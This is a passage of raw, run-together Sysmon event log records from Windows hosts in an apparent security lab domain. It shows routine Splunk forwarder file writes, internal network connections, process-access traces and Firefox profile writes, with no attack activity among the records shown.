Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62F3DD0213393E12C223A76F8F81C263,SHA256=95A1F55E2A29090443C8A3BCBFBC4B38FCADF6CFD50D2FC9C0963B725139AA8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:44.362{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91BC869F1D7DB7F1BFEC9D0BE61B9188,SHA256=BCD3288F726B254569332199132126358A562BFC9953C442EA4D9488D1187CFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:45.792{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D807F02606795221C8E4AA928F438D,SHA256=B792D3CB5E11320F71D2E7734A4AC228D8EC21D9AC5C63C5D61103B9FF0D4D0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:45.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99BFA9F141A5E0893FDBE52B7C817102,SHA256=11F6949955B663F43CBFFDCCBC24F00C12C907E4DAD4FDCE49ACCBFD53DAB7A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:43.348{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57489-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:46.792{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B4D872DF7B5129F4721E101BE248E8,SHA256=D75341314E550EAE45868131419C59D8B02CC951AFC8653036952F603AC56D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:46.418{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=413AD088F3FFB8C955E262FFA624EB92,SHA256=BCA6A3B5D1C9F4766033ED7ED14D1031AA354217458ED67001B89E8EB6A30347,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:47.808{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12F0C6A2ED4BAAC567C30916DC2537C3,SHA256=33BB6542A3197E2D90B6ECA03C93DC93E88E9112963552D00A983205EE0B7746,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:39.590{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62000-false10.0.1.12-8000- 23542300x80000000000000001055377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:47.449{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5351EF972834255DE87EA2DC60212392,SHA256=B3887D34D4433FF49E9F6C73E5D677E1AA6EC6584369506228A0BB93D6D7D36C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:48.839{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BD2298B06D6BD0C511F50FAB31A2201,SHA256=44A273FFEA82AA8EDE7FDE75CC78EEE85F0F1AB43BB9F3E935C6531B949CAFD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:48.482{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72CB2CA7831FB0E076ED43335D7CD693,SHA256=84BC04261E68DB705C7F6BD2A3DB1041238907A4D084EC5B27597AB39686E19A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:49.870{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CDCBFDEBED4EB9DDE016058835341FB,SHA256=D2FBA9A859972C0D3805FA6FB654226F0F0E511678AA72D8739C49D0E57497E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:49.501{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087B716734AD8954A2180403196E6840,SHA256=D24EE5D74AE993B06EE8C5043FD29A7F79EE255FCC4CFD5E5E28425B23781079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:50.870{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA956E8DF6D1EC5997F71FA435A0F6DD,SHA256=800E8A34A86C161F929A35A64F8EC9CFDA07A4AA308537559E421DCBD625A87C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.915{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8CE-60EB-0A7E-00000000CF01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:50.915{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.915{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:50.900{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.900{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.900{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F8CE-60EB-0A7E-00000000CF01}220C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.900{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8CE-60EB-0A7E-00000000CF01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.902{466BC892-F8CE-60EB-0A7E-00000000CF01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=162418B1E59357F67B4FA170607BDD3A,SHA256=3E732E078AE43C70D6D87B138D1F6B1876B6AF6B0F5C71882F03624B9A3F64C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9FF9913392717F16A20492349C9AED91,SHA256=4AF38EF192BDAB3602E9080FF0DEBF8BCE7FE447AA642A4159B1A0C6843CB771,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CD4D0EBA19E0CD9A7FEC3B298A3DF8EF,SHA256=46A325F864BA92080A51FCBC04D42A8A05793281FA2AB94CA85530A5EF2F4CEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9794421CC9606DDE15ACD5FF578B53A9,SHA256=8E67CCF9480FE5660B0D51364ED0BADFD000A3D3AB96F8A816C38977B15DDBD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C180C870862104EBE277753F59F8A51E,SHA256=18FC05B504B00258DA4544C8CCE96334F70E7E71D3BB79E6A42BB0DFAF530D5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4F6732EC4C0AFA9EA071070F44815488,SHA256=6DD8754E059B37F872F7E233BD408CFA7DD9E6FBD9D91F0502C87C75A30904DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3947402F26457D8EF6FAEC8FD043F0DE,SHA256=5D292532B09F547F04C64B64E2D5EC036E02BC3BEE1247F122975D6312A48999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3782BEBE784D71F9EA643CF1B3BE9BF3,SHA256=D282DA8B4216B1F1DF3E5AEC8E247DF878DB11986E7D1CA1BAB6C1A27502FEDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2DD8287CAD1FD0F7B68FE8ED319CB280,SHA256=3F7E1E90AB23152335C67F0052729DD0D199A4CDB75ED3C92585AC87B3A8A2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CB51397D304AB12FED961CF311472061,SHA256=F47F3467B73C4644FA8E02AB3DDC47886E7A25B6C1014F37D87B0DFCF57E7F2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BFACFD04D2EEEC078DEC091EB41AAAB5,SHA256=AF538F65513B2B0B894CE4679034ADEE4119D39D4D599B58ADB4EC412D0DE0BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:50.562{466BC892-F8CE-60EB-097E-00000000CF01}902810036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5AC893D5272E7D437C5675DCF2DF128,SHA256=3BC470279AB4B34A267F07E4B381283BAD712BE60E8CE89F1B581D4C77BD8B72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8CE-60EB-097E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:50.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:50.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 